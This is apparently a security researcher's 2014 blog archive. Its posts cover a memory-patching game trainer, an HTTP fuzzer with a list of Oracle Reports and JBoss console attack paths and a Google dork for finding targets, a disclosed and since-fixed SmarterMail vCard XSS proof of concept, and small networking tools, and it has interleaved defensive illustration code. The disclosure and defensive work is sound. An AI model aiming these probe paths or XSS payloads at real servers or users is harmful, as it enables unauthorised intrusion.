[ Game Trainer ] Assassins Creed 4 – Black Flag Stealth/Invisibility hack

•September 29, 2014


Here is a basic trainer for Assassins Creed 4 – Black Flag.
The game, although fun, is full of annoying sneaking missions. This trainer can assist here.
By searching for a specific array of bytes that represents a compare and a conditional jump, and replacing those bytes with no-operation (NOP) instructions, a sort of invisibility hack is created. Because the trainer searches for an array of bytes rather than relying on fixed addresses, it can work on multiple versions of the game, if not all versions.

The array of bytes to search for is: 0x80, 0x7d, 0xff, 0x00, 0x74, 0x0a, 0x5e

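This should be replaced with six NOPs (0x90). They cover the compare (0x80, 0x7d, 0xff, 0x00) and the jump (0x74, 0x0a); the final 0x5e is part of the search pattern but is not overwritten.
The address in my version of the game is 0x018a239b.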

Image of memory before patching:

ac4before1

Image of memory after patching:

ac4after2

I have attached source code to automatically patch it.

The trainer is designed as a launcher, and as such must be placed within the game's root directory and then executed. The trainer then launches Assassins Creed while searching for the relevant array of bytes to patch. The hack is complete once a call to WriteProcessMemory is made and six NOPs are written to the address determined through pattern-searching.

Image of the trainer/launcher is displayed below:

launcher

[ CODE ] Trainer.c
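The following is an added example, not the Trainer.c linked above: it runs the pattern search on constructed in-memory buffers instead of a live process, to show why a signature survives a change of address between builds and why a match should be unique before anything is overwritten. The function names and sample buffers are assumptions made for the illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Signature from the post: six bytes to overwrite (cmp + je) followed by
   one trailing context byte (0x5e) that is matched but left in place. */
static const unsigned char SIG[] = {0x80, 0x7d, 0xff, 0x00, 0x74, 0x0a, 0x5e};
#define PATCH_LEN 6 /* leading bytes replaced with NOP (0x90) */

/* Offset of the first match at or after `from`, or -1 if there is none. */
long find_sig(const unsigned char *buf, size_t len, size_t from)
{
    for (size_t i = from; i + sizeof SIG <= len; i++)
        if (memcmp(buf + i, SIG, sizeof SIG) == 0)
            return (long)i;
    return -1;
}

/* Patch only when the signature occurs exactly once. Returns the patched
   offset, -1 when not found, -2 when ambiguous (buffer left untouched). */
long patch_unique(unsigned char *buf, size_t len)
{
    long first = find_sig(buf, len, 0);
    if (first < 0)
        return -1;
    if (find_sig(buf, len, (size_t)first + 1) >= 0)
        return -2;
    memset(buf + first, 0x90, PATCH_LEN);
    return first;
}

/* Constructed samples: the same code bytes at different offsets, standing in
   for two builds; `twice` holds the signature two times. */
unsigned char build_a[] = {0x55, 0x8b, 0xec, 0x80, 0x7d, 0xff, 0x00, 0x74, 0x0a, 0x5e, 0xc3};
unsigned char build_b[] = {0x90, 0x55, 0x8b, 0xec, 0x51, 0x80, 0x7d, 0xff, 0x00, 0x74, 0x0a, 0x5e, 0xc3};
unsigned char twice[] = {0x80, 0x7d, 0xff, 0x00, 0x74, 0x0a, 0x5e,
                         0x80, 0x7d, 0xff, 0x00, 0x74, 0x0a, 0x5e};

int main(void)
{
    printf("build A: %ld\n", patch_unique(build_a, sizeof build_a));
    printf("build B: %ld\n", patch_unique(build_b, sizeof build_b));
    printf("twice:   %ld\n", patch_unique(twice, sizeof twice));
    return 0;
}
```

A short signature can match unrelated code, which is why the ambiguous case is refused rather than patched at the first hit.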

Representing Telspace Systems at ITWeb Security Summit

•May 28, 2014

telspaceitweb

Over the past two days (the 27th and 28th of May 2014) Telspace Systems has sponsored the ITWeb Security Summit in Sandton, South Africa.

Telspace was represented through the above stand and a slew of hard-working staff.


[ Security Tool ] Orafuzz Version 2 – HTTP Fuzzing Tool

•April 29, 2014


This application is a rewrite of my original fuzzer. Several features have been added, as well as a full user-friendly GUI.

The major change in this version is the ability to modify and add the attack strings through the provided sample list. This adds to the overall flexibility of the application.

Additionally, the application now supports both POST and GET requests.
The provided text file “attackstrings.txt” contains a list of attack request strings; this file must reside in the application's root directory.

This can also be used to determine whether vulnerability “CVE-2007-1036 JBoss JMX-Console Access Vulnerability” exists on a particular server.

You can try for yourself a target with google, and a google dork: inurl: /reports/rwservlet/help?

As mentioned, the contents can be modified to suit the attacker's needs.
The sample contents of the “attackstrings.txt” file are as below:

/reports/rwservlet
/reports/rwservlet/showenv?
/reports/rwservlet/showjobs?
/reports/rwservlet/help?
/reports/rwservlet/showmap?
/reports/rwservlet/showmyjobs?
/reports/rwservlet/showjobid?
/reports/rwservlet/killjobid?
/reports/rwservlet/parsequery?
/reports/rwservlet/showauth?
/reports/rwservlet/delauth?
/reports/rwservlet/getjobid?
/reports/rwservlet/getserverinfo?
/reports/rwservlet/killengine?
/discoverer/app
/web-console
/jmx-console

The application and code can be downloaded and viewed below:

[ .TXT C-Code ] OraFuzz_V2_GUI.c
[ .TXT C-Code ] fuzzer.c
[ .TXT C-Code ] OraFuzz_V2_GUI.h
[ .ZIP ] VS Project Files
[ .ZIP/.EXE ] Executable File
[ .TXT ] Attackstrings.txt
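From the server side, requests for the paths in the sample list above stand out in an access log. The following is an added example, not part of Orafuzz: it flags log lines whose request path falls under one of the listed prefixes. The common-log-format layout, the function names and the sample lines are assumptions constructed for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Path prefixes from the post's sample attackstrings.txt; every
   /reports/rwservlet/... entry is covered by the first prefix. */
static const char *PROBES[] = {"/reports/rwservlet", "/discoverer/app",
                               "/web-console", "/jmx-console"};

/* Prefix match that must end on a path boundary ('/', '?' or end). */
int is_probe_path(const char *path)
{
    for (size_t i = 0; i < sizeof PROBES / sizeof PROBES[0]; i++) {
        size_t n = strlen(PROBES[i]);
        if (strncmp(path, PROBES[i], n) == 0 &&
            (path[n] == '\0' || path[n] == '/' || path[n] == '?'))
            return 1;
    }
    return 0;
}

/* Copy the request target from a common-log-format line; 0 on success. */
int request_path(const char *line, char *out, size_t outlen)
{
    const char *q = strchr(line, '"');
    const char *sp = q ? strchr(q, ' ') : NULL;
    size_t n = sp ? strcspn(sp + 1, " \"") : 0;
    if (n == 0 || n >= outlen)
        return -1;
    memcpy(out, sp + 1, n);
    out[n] = '\0';
    return 0;
}

/* Number of lines whose request path hits a listed prefix. */
int count_probes(const char *const *lines, size_t count)
{
    char path[256];
    int hits = 0;
    for (size_t i = 0; i < count; i++)
        hits += request_path(lines[i], path, sizeof path) == 0 && is_probe_path(path);
    return hits;
}

/* Constructed sample log lines. */
const char *const SAMPLE[] = {
    "192.0.2.10 - - [29/Apr/2014:10:00:01 +0000] \"GET /reports/rwservlet/showenv? HTTP/1.1\" 200 512",
    "192.0.2.10 - - [29/Apr/2014:10:00:02 +0000] \"POST /jmx-console HTTP/1.1\" 401 0",
    "192.0.2.77 - - [29/Apr/2014:10:00:03 +0000] \"GET /jmx-console-docs HTTP/1.1\" 404 0"};
int main(void) { printf("%d probe requests\n", count_probes(SAMPLE, 3)); return 0; }
```

The match is case-sensitive and works on the raw request target, so a production rule would normalise case and percent-encoding first.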

[XSS] Brief Security Review – Smartermail 12.0 and 5.5 Enterprise

•April 28, 2014

SMARTERMAIL 12.0.x FREE EDITION:

Vulnerability 1:
Contact Book XSS:

It is possible to send someone a vulnerable .vcf contact file, assuming they are accessing it through Smartermail. The code is executed upon viewing the contact book.
The following .vcf file parameters were used, including the attack command, in JavaScript, alert(1):

v12_contact
The following was the result of the above XSS attack:
v12

Version 5.5 Enterprise:
The fields used can be seen below:

BEGIN:VCARD
ADR;HOME=TRUE:;;foo11;foo12;foo13;foo14;foo15
ADR;WORK=TRUE:;foo25;foo18;foo19;foo20;foo21;foo22
EMAIL;INTERNET=TRUE:alert(2)
FN:foo1 foo2 foo3 foo4
N:foo3;foo1;foo2;;foo4
NOTE:foo24
ORG:alert(6);foo17
PRODID:-//SmarterTools//SmarterMail//EN
REV:20140119T173038Z
SORT-STRING:alert(1)
TEL;ISDN=TRUE:foo10
TEL;PAGER=TRUE:foo8
TEL;CELL=TRUE;VOICE=TRUE:alert(4)
TEL;HOME=TRUE;VOICE=TRUE:foo7
TEL;WORK=TRUE;VOICE=TRUE:alert(3)
TEL;HOME=TRUE;FAX=TRUE:foo9
TEL;WORK=TRUE;FAX=TRUE:alert(5)
TITLE:foo16
URL:foo6
END:VCARD

5.5_address

The result can be seen below. On visiting the contacts page, the code is executed:

5.5_address_result

The VCARDS used in these attacks can be viewed here:
[ .TXT ] VCard Version 12.0
[ .TXT ] VCard Version 5.5 Enterprise

This issue was reported to Smartertools and I am happy to report that the issues have been resolved speedily with a new build with version numbers after and including: 12.0.5197.19984
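The usual defence against this class of stored XSS is to encode contact fields when they are rendered as HTML. The following is an added example of that encoding applied to a vCard content line; it is not SmarterTools' fix, and the function names and the sample line are constructed for the illustration.

```c
#include <stdio.h>
#include <string.h>

char rendered[128]; /* output buffer used by main() */

/* HTML-escape src into dst. Returns 0, or -1 if dst is too small. */
int html_escape(const char *src, char *dst, size_t dstlen)
{
    size_t o = 0;
    if (dstlen == 0)
        return -1;
    for (; *src; src++) {
        const char *rep = NULL;
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t n = rep ? strlen(rep) : 1;
        if (o + n >= dstlen)
            return -1;
        memcpy(dst + o, rep ? rep : src, n);
        o += n;
    }
    dst[o] = '\0';
    return 0;
}

/* Split one vCard content line at the first ':' (name and parameters
   before it, value after) and write the value HTML-escaped into dst.
   Assumes no quoted parameter value contains ':'. */
int render_vcard_value(const char *line, char *dst, size_t dstlen)
{
    const char *colon = strchr(line, ':');
    return colon ? html_escape(colon + 1, dst, dstlen) : -1;
}

/* Constructed sample line; the markup is illustrative. */
const char SAMPLE_LINE[] = "EMAIL;INTERNET=TRUE:<script>alert(2)</script>";

int main(void)
{
    if (render_vcard_value(SAMPLE_LINE, rendered, sizeof rendered) == 0)
        puts(rendered);
    return 0;
}
```

This encoding is for values placed in HTML element content; values written into attributes, URLs or script blocks need the encoding for that context.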

[ Code ] Enumerating Wifi access-points programmatically.

•April 8, 2014

Here's some brief code that allows you to enumerate and scan for wireless APs in your vicinity.
The data is both printed on screen and stored in a log file for easy viewing.

mainprogram

logfile

 

[ .TXT ] C- Code

[ .ZIP ] Project Files

[ .ZIP ] Executable File

[ Tool Work in Progress ] WinSniff – TCP/UDP Sniffer

•March 19, 2014

So I have been working on a packet sniffer for the past few days, experimenting with WinPcap.

My packet sniffer supports both the UDP and TCP protocols and enumerates information such as hardware addresses, IP addresses, ports and data payloads for each packet.

Tools like this can be used extensively for debugging networking applications. You will need WinPcap installed on your computer for this to work.

The below screenshot illustrates the tool in action intercepting both UDP and TCP packets.

sniffer_v2b

Before sniffing can begin you need to select the desired interface by clicking on the interface tab. This will bring up a dialog prompt as follows; for example, my input would be the numeric digit 1.

sniffer_v2_interfaces

Let me know of any suggestions or help debugging it! I have had one report of it not displaying interfaces in Windows 8.

But for XP and Windows 7 32 and 64 bit versions it works perfectly.

[ DOWNLOAD EXTERNAL ] WINPCAP

[ .ZIP / EXE ] Program Executable

[ C Code and Tool ] Wake On LAN

•March 15, 2014

Here's a simple Wake-on-LAN application for use in system administration.

wol_c

As the name implies, it causes a correctly set-up computer to boot up remotely when instructed to do so.
This happens when the application sends six repetitions of 0xFF followed by 16 repetitions of the target's MAC address, represented here as AA:BB:CC:DD:EE:FF, as displayed in the final created packet below. The highlighted section of six 0xFF's is known as the Magic Packet.

wol_c2

This packet is sent over UDP to the broadcast address of 255.255.255.255.

To quote Wikipedia: “Wake-on-LAN support is implemented on the motherboard of a computer and the network interface (firmware), and is consequently not dependent on the operating system running on the hardware.”

The code makes use of the Winsock sendto function, which enables a packet to be sent to a port/host which is not connected.
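The byte layout described above, as an added example that is not the post's own source: it builds the 102-byte payload from a MAC address string and, as a capture-side check, locates that payload inside a buffer such as a sniffed UDP datagram. The function names are assumptions, and the sendto call itself is left out so the code runs without a network.

```c
#include <stdio.h>
#include <string.h>

#define WOL_LEN (6 + 16 * 6) /* 102 bytes */
unsigned char packet[WOL_LEN]; /* output buffer used by main() */

/* Parse "AA:BB:CC:DD:EE:FF"; returns 0, or -1 on malformed input. */
int parse_mac(const char *text, unsigned char mac[6])
{
    unsigned int b[6];
    char tail;
    if (sscanf(text, "%2x:%2x:%2x:%2x:%2x:%2x%c",
               &b[0], &b[1], &b[2], &b[3], &b[4], &b[5], &tail) != 6)
        return -1;
    for (int i = 0; i < 6; i++)
        mac[i] = (unsigned char)b[i];
    return 0;
}

/* Build the payload: six 0xFF bytes, then the MAC repeated 16 times. */
int build_wol(const char *mac_text, unsigned char out[WOL_LEN])
{
    unsigned char mac[6];
    if (parse_mac(mac_text, mac) != 0)
        return -1;
    memset(out, 0xFF, 6);
    for (int i = 0; i < 16; i++)
        memcpy(out + 6 + i * 6, mac, 6);
    return 0;
}

/* Offset of a complete payload for mac_text inside buf, or -1 if absent. */
long find_wol(const unsigned char *buf, size_t len, const char *mac_text)
{
    unsigned char want[WOL_LEN];
    if (build_wol(mac_text, want) != 0)
        return -1;
    for (size_t i = 0; i + WOL_LEN <= len; i++)
        if (memcmp(buf + i, want, WOL_LEN) == 0)
            return (long)i;
    return -1;
}

int main(void)
{
    if (build_wol("AA:BB:CC:DD:EE:FF", packet) == 0)
        printf("payload found at offset %ld\n",
               find_wol(packet, sizeof packet, "AA:BB:CC:DD:EE:FF"));
    return 0;
}
```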

[ MSDN ] sendto function
[ .ZIP / .EXE  ] Executable files
[ .ZIP ] Project Files
[ .TXT  ] C Source Files

 